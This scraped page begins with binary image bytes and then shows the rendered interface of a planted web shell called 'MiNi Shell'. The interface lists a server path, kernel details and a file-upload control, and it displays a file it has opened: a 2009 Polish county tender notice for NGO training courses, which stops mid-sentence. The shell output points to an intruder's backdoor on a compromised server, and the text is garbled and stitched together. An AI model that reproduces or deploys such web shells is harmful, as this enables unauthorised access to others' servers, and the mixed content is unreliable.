JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090827/141735-N-2009.html

<p class="kh_header"><b>Lębork: NA ORGANIZACJĘ I PRZEPROWADZENIE SZKOLEŃ</b><br>
<b>Numer ogłoszenia: 141735 - 2009; data zamieszczenia: 27.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-lebork.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NA ORGANIZACJĘ I PRZEPROWADZENIE SZKOLEŃ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla organizacji pozarządowych i ich członków w ramach projektu pn.: Wsparcie sektora ekonomii społecznej - szansą na rozwój Powiatu Lęborskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej). Przedmiot zamówienia został podzielony na 5 części.

a) Część I - Szkolenie pn. Zasady rachunkowości w NGO

	Program szkolenia powinien obejmować m.in. zagadnienia:
	Prezentacja podstawowych aktów prawnych regulujących sposób prowadzenia księgowości w organizacjach pozarządowych
	Odpowiedzialność za prowadzenie ksiąg
	Podstawowe zasady rachunkowości a księgowość w NGO
	Wymogi dotyczące dokumentacji zasad (polityki) rachunkowości
	Prezentacja i omówienie przykładowego planu kont
	Wpływ ustawy o działalności pożytku publicznego i o wolontariacie na sposób prowadzenia ksiąg rachunkowych
	Prezentacja wykorzystania programu księgowego dla potrzeb wypełnienia wszystkich wymagań aktów prawnych determinujących sposób prowadzenia księgowości w NGO
	Omówienie elementów i zasad sporządzania sprawozdania finansowego
	Omówienie zasad ewidencji rzeczowych aktywów trwałych

	Szkolenie odbędzie się trzy razy w trakcie realizacji projektu (w 3 grupach szkoleniowych) 
	Liczba uczestników: 20 osób w jednej grupie; łącznie 60 osób
	Czas trwania szkolenia: 2 dni dla jednej grupy szkoleniowej po 6 godzin w każdym dniu = 12 godzin. Łączna liczba godzin szkoleniowych to 36 godzin (12 godzin x 3 grupy szkoleniowe). Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. W każdym dniu szkoleń przewiduje się 20 minutową przerwę na obiad.

b) Część II - Szkolenie pn. Możliwość zarobkowania, pozyskiwania środków, zakładanie 
i prowadzenie działalności gospodarczej 

	Program szkolenia powinien obejmować m.in. zagadnienia:
	Potencjalne źródła finansowania organizacji pozarządowych: fundraising, zbiórki publiczne, działalność odpłatna i gospodarcza, 1% OPP, nawiązki sądowe, darowizny od sponsorów, granty, Europejski Fundusz Społeczny
	Zdobywanie i utrzymywanie darczyńców - listy do sponsorów, umowy sponsorskie, podziękowania
	Jak przygotować plan zbierania funduszy - określenie potrzeb organizacji i przygotowanie strategii, przygotowanie budżetu, motywacje darczyńców, określenie potencjalnych źródeł finansowania - co należy wiedzieć, opracowanie planu i harmonogramu pozyskiwania środków
	Przepisy i formalności związane z założeniem działalności gospodarczej
	Różnice pomiędzy działalnością statutową odpłatną i nieodpłatną oraz działalnością gospodarczą organizacji pozarządowej (w tym kiedy rozpocząć prowadzić działalność odpłatną pożytku publicznego, a kiedy działalność gospodarczą)
	Prezentacja podstawowych aktów prawnych regulujących zasady prowadzenia działalności gospodarczej 
w NGO 
	Zmiany rejestrowe organizacji pozarządowych związane z prowadzoną działalnością gospodarczą 
	Zmiany w rachunkowości związane z prowadzoną działalnością gospodarczą
	Obowiązki podatkowe organizacji prowadzących działalność gospodarczą
	Działalność gospodarcza w organizacji pożytku publicznego

	Szkolenie odbędzie się raz w trakcie realizacji projektu (1 grupa szkoleniowa) 
	Liczba uczestników: 20 osób
	Czas trwania szkolenia: 4 dni po 6 godzin w każdym dniu = 24 godziny. Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. W każdym dniu szkolenia przewiduje się 20 minutową przerwę na obiad.

c) Część III - Szkolenie pn. Praca z osobami wykluczonymi społecznie oraz ich rodzinami 

	Program szkolenia powinien obejmować m.in. zagadnienia:
	Przepisy prawne i wynikające z nich zadania dla organizacji pozarządowych działających na rzecz osób wykluczonych społecznie
	Co to jest wykluczenie społeczne
	Grupa osób wykluczonych społecznie
	Specyfika pracy z osobami wykluczonymi społecznie
	Dysfunkcje występujące u osób wykluczonych społecznie
	Metody pracy z osobami wykluczonymi społecznie oraz ich rodzinami
	Sposoby przeciwdziałania wykluczeniu społecznemu
	Superwizja i coaching
	Przeciwdziałanie wypaleniu zawodowemu
	Kształtowanie umiejętności interpersonalnych - efektywna komunikacja, asertywność, automotywacja i walka ze stresem, praca w konflikcie
	Elementy doradztwa zawodowego i pośrednictwa pracy w kontekście pracy socjalnej (charakterystyka rynku pracy, problematyka rozwoju zawodowego, metody diagnozy predyspozycji zawodowych, psychologiczne problemy bezrobocia, rozmowa doradcza, metody aktywnego poszukiwania pracy)
	Ekonomia społeczna szansą dla osób wykluczonych społecznie
	Budowanie współpracy międzyinstytucjonalnej w zakresie pracy z osobami wykluczonymi społecznie (budowanie dialogu społecznego)

	Szkolenie odbędzie się trzy razy w trakcie realizacji projektu (3 grupy szkoleniowe) 
	Liczba uczestników: 20 osób w jednej grupie; łącznie 60 osób
	Czas trwania szkolenia: 5 dni dla jednej grupy szkoleniowej po 6 godzin w każdym dniu = 30 godzin. Łączna liczba godzin szkoleniowych to 90 godzin (30 godzin x 3 grupy szkoleniowe). Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. W każdym dniu szkolenia przewiduje się 20 minutową przerwę na obiad.

d) Część IV - Szkolenie pn. Wzmacnianie kwalifikacji w zakresie pozyskiwania środków i realizowania projektów

	Program szkolenia powinien obejmować m.in. zagadnienia:
	Źródła finansowania projektów realizowanych przez organizacje pozarządowe
	Gdzie szukać informacji o środkach dla NGO?
	Fundusze Strukturalne 2007-2013 - ogólne informacje
	Możliwości pozyskiwania środków z funduszy UE
	Procedury pozyskiwania środków unijnych
	Dokumenty programowe oraz wytyczne
	Od pomysłu do realizacji projektu współfinansowanego ze środków zewnętrznych - jak napisać dobry projekt
	Zasady prawidłowego przygotowania wniosku o dofinansowanie - wprowadzenie do pracy z Generatorem Wniosków Aplikacyjnych, pułapki w GWA
	Nieprawidłowości we wnioskach aplikacyjnych i najczęściej popełniane błędy
	Dokumenty projektowe (m.in. umowa o dofinansowanie, wniosek o płatność)
	Zasady gromadzenia dokumentów
	Zasady promocji projektu
	Analiza realizacji projektu i wprowadzanie zmian
	Ewaluacja projektu
	Kontrola w projekcie 

	Szkolenie odbędzie się dwa razy w trakcie realizacji projektu (2 grupy szkoleniowe) 
	Liczba uczestników: 20 osób w jednej grupie; łącznie 40 osób
	Czas trwania szkolenia: 3 dni dla jednej grupy szkoleniowej po 6 godzin w każdym dniu = 18 godzin. Łączna liczba godzin szkoleniowych to 36 godzin (18 godzin x 2 grupy szkoleniowe). Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. W każdym dniu szkolenia przewiduje się 20 minutową przerwę na obiad.

e) Część V - Szkolenie pn. Rozliczanie zadań, grantów, projektów i innych środków zewnętrznych 

	Program szkolenia powinien obejmować m.in. zagadnienia:
I Blok
	Jak współpracować z administracją publiczną - formy współpracy i przepisy prawne
	Współpraca finansowa z administracją - wspieranie i powierzanie zadań, konkurs ofert, oferta i jej wzór, umowa i jej wzór, kontrola i ocena realizacji zadania, sprawozdawczość
	Najczęściej popełniane błędy przez organizacje pozarządowe przy rozliczaniu środków finansowych
II Blok
	Realizacja projektów współfinansowanych ze środków Unii Europejskiej
	Księgowość funduszy unijnych
	Budżet projektu
	Kwalifikowalność kosztów
	Cross-finansing
	Dokumentowanie wydatków
	Generator Wniosków Płatniczych
	Krok po kroku jak wypełniać wniosek o płatność
	Co to jest PEFS i jak go wypełniać
	Najczęściej popełniane błędy przy rozliczaniu projektów EFS
	Kontrola projektu - jak się do niej dobrze przygotować

	Szkolenie odbędzie się dwa razy w trakcie realizacji projektu (2 grupy szkoleniowe) 
	Liczba uczestników: 20 osób w jednej grupie; łącznie 40 osób
	Czas trwania szkolenia: 3 dni dla jednej grupy szkoleniowej po 6 godzin w każdym dniu = 18 godzin. Łączna liczba godzin szkoleniowych to 36 godzin (18 godzin x 2 grupy szkoleniowe). Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut i 15 minut przerwy. W każdym dniu szkolenia przewiduje się 20 minutową przerwę na obiad.

Dodatkowe informacje (wymogi i obowiązki Wykonawcy oraz Zamawiającego) - dotyczy pięciu części zamówienia:
1. Zamawiający nie przewiduje rozliczania w walutach obcych.
2. Zamawiający nie przewiduje zawarcia umowy ramowej.
3. Zamawiający nie przewiduje aukcji elektronicznej.
4. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
5. Szkolenia należy przeprowadzić w wybrane przez zamawiającego dni powszednie od poniedziałku do piątku lub w weekend (sobota, niedziela). Terminy i godziny zajęć dostosowane będą do najbardziej pożądanych przez odbiorców szkoleń.
6. Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenie niezbędne do wykonania zamówienia. Przedmiot zamówienia należy zrealizować w miejscu wskazanym przez Powiat Lęborski na terenie miasta Lęborka. Wykonawca może korzystać nieodpłatnie ze sprzętu zakupionego do obsługi Inkubatora Ekonomii Społecznej- laptop, rzutnik multimedialny, ekran do rzutnika, flipchart. 
7. Wykonawca wyposaży uczestników w materiały dydaktyczne (szkoleniowe) oraz piśmiennicze nie podlegające zwrotowi, które będą wykorzystywane podczas szkolenia.
8. Wykonawca zobowiązany jest do przeprowadzenia szkolenia zgodnie z programem szkolenia.
9. Wykonawca zobowiązany jest do wydania odpowiednich zaświadczeń, certyfikatów lub dyplomów potwierdzających odbycie szkolenia w ostatnim dniu zajęć.
10. Wykonawcy za wykonanie przedmiotu umowy przysługuje wynagrodzenie ryczałtowe.
11. Wykonawca zobowiązany jest do odpowiedniego oznaczenia (zgodnie z wytycznymi w zakresie informacji 
i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl) wszystkich miejsc i dokumentów bezpośrednio związanych z realizacją usługi tj. korespondencji dotyczącej Projektu i wszystkich innych dokumentów z nim związanych wychodzących od Wykonawcy poprzez m.in. zamieszczanie na zaświadczeniach, certyfikatach, dyplomach oraz materiałach dydaktycznych, podręcznikach, pomocach naukowych, itp., odpowiednich logotypów oraz informacji o współfinansowaniu.
12. Wykonawca zobowiązany jest do rejestracji szkolenia przed jego rozpoczęciem na stronie www.inwestycjewkadry.pl
13. Wykonawca zobowiązany jest do ubezpieczenia beneficjentów od następstw nieszczęśliwych wypadków przez cały okres trwania szkoleń.
14. Zamawiający zapewni uczestnikom szkoleń w przerwach między zajęciami drobny poczęstunek (kawę, herbatę, ciastka), jak również obiad.
15. Wykonawca zobowiązany jest do przeprowadzenia wśród uczestników szkoleń ankiet ewaluacyjnych na rozpoczęcie i zakończenie szkolenia - rozdanie i zebranie wypełnionych ankiet. Zamawiający przekaże Wykonawcy ankiety ewaluacyjne opracowane w ramach odrębnego zadania - Ewaluacja - nie dotyczącego przedmiotu zamówienia. 
16. Po zakończeniu każdego szkolenia Wykonawca zobowiązany jest do dostarczyć Zamawiającemu dokumentację dot. szkoleń, m.in. faktury VAT, listy obecności, ankiety ewaluacyjne, kserokopie zaświadczeń, certyfikatów lub dyplomów potwierdzających ukończenie szkolenia, imienny wykaz osób, które nie ukończyły szkolenia, komplet materiałów dydaktycznych (szkoleniowych), w które Wykonawca wyposażył uczestników oraz potwierdzenie odbioru materiałów dydaktycznych, certyfikatów, dyplomów lub zaświadczeń.
17. Zamawiający zastrzega sobie Zamawiający (w związku z finansowaniem ze środków unijnych) zastrzega sobie oraz instytucjom upoważnionym do przeprowadzenia kontroli prawo wglądu do dokumentów Wykonawcy związanych z realizowaniem zamówienia, w tym dokumentów finansowych. 
18. Wykonawca zobowiązany jest do przechowywania dokumentacji Wykonawcy związanej z realizacją przedmiotu umowy do dnia 31.12.2020 roku w sposób zapewniający dostępność, poufność i bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji tychże dokumentów..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy spełniają określone przez Zamawiającego warunki tj.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,

Ocena spełnienia ww warunków dokonana zostanie zgodnie z formułą spełnia nie spełnia w oparciu 
o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 9 Specyfikacji Istotnych Warunków Zamówienia. Z treści załączonych dokumentów musi jednoznacznie wynikać, że ww warunki Wykonawca spełnił.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt 1-3 winien spełniać jeden Wykonawca lub Wykonawcy wspólnie, warunek określony w pkt 4 winni spełniać wszyscy Wykonawcy.
Dotyczy wszystkich części zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunków stawianych Wykonawcom przez Zamawiającego oraz dla uznania formalnej poprawności oferta musi zawierać następujące dokumenty i oświadczenia: 
a)	formularz ofertowy (załącznik nr 1),
b)	pełnomocnictwo określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, 
c)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
d)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału zakładu ubezpieczeń społecznych lub kasy rolniczego ubezpieczenia społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
e)	oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych (załącznik nr 2)
f)	oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy pzp (załącznik nr 3)
g)	wykaz wykonanych przez Wykonawcę co najmniej 2 usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia jest krótszy - w tym okresie, o tematyce zbliżonej do przedmiotu zamówienia, z określeniem nazwy szkolenia, liczby przeszkolonych osób, nazwy zamawiającego, terminu realizacji szkolenia, a także jego wartości. Do wykazu należy załączyć dokumenty (referencje) potwierdzające, że wszystkie wyszczególnione usługi zostały wykonane należycie (załącznik nr 4).
h)	wykaz osób(kadry dydaktycznej), które będą uczestniczyć w wykonywaniu zamówienia, wraz 
z informacjami na temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zamówienia (załącznik nr 5). 
i)	szczegółowy program szkolenia (załącznik nr 6),
j)	oświadczenie Wykonawcy o posiadaniu lub nie posiadaniu certyfikatu jakości usług oraz ich liczbie.

W przypadku wnoszenia oferty wspólnej przez dwa podmioty lub więcej podmiotów gospodarczych każdy z nich nie może podlegać wykluczeniu z postępowania na podstawie art. 24 Pzp. - każdy z podmiotów występujących wspólnie musi złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu (Załącznik nr 3). Oferta złożona przez podmioty występujące wspólnie musi zawierać pełnomocnictwo dla podmiotu reprezentującego wszystkie podmioty występujące wspólnie. 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://powiat.leborski.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.09.2009 godzina 12:00, miejsce: w Sekretariacie Starostwa Powiatowego w Lęborku ul. Czołgistów 5, 84-300 Lębork.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wsparcie sektora ekonomii społecznej - szansą na rozwój Powiatu Lęborskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki 2007-2013,

Creat By MiNi SheLL
Email: jattceo@gmail.com